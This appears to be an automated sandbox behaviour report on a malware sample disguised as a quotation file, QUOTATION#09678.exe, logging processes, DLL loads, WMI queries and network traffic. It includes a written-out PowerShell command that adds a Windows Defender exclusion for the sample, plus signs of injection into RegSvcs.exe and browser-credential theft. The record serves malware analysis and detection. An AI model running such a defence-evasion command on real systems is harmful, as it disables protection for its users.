Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6704

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oku3m0ak.wrk.ps1

Jump to behavior

Source: QUOTATION#09678.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION#09678.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 0000000B.00000002.1537172101.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000003062000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1537172101.0000000002F56000.00000004.00000800.00020000.00000000.sdmp, tmp48B5.tmp.11.dr, tmp7D47.tmp.11.dr, tmpA231.tmp.11.dr, tmpA253.tmp.11.dr, tmp48A5.tmp.11.dr, tmp48B6.tmp.11.dr, tmpA252.tmp.11.dr, tmp7D36.tmp.11.dr, tmpD972.tmp.11.dr, tmp7D35.tmp.11.dr, tmp10CF.tmp.11.dr, tmpA242.tmp.11.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION#09678.exe

ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

File read: C:\Users\user\Desktop\QUOTATION#09678.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION#09678.exe "C:\Users\user\Desktop\QUOTATION#09678.exe"
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6704 -s 1332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\QUOTATION#09678.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QUOTATION#09678.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION#09678.exe

Static file information: File size 3192961 > 1048576

Source: QUOTATION#09678.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: QUOTATION#09678.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb??\p source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdbMZ source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdbH source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.pdbH source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Drawing.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb) source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdb source: WEREC11.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WEREC11.tmp.dmp.16.dr

Source: QUOTATION#09678.exe

Static PE information: 0xB235CF4A [Sun Sep 28 23:42:02 2064 UTC]

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7BF7CE push cs; ret	0_2_00007FFAAC7BF7CF
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC7C42DB push ecx; iretd	0_2_00007FFAAC7C42DC
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Code function: 0_2_00007FFAAC890001 push esp; retf 4810h	0_2_00007FFAAC890312

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 13484
Source: unknown	Network traffic detected: HTTP traffic on port 13484 -> 49790

Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION#09678.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
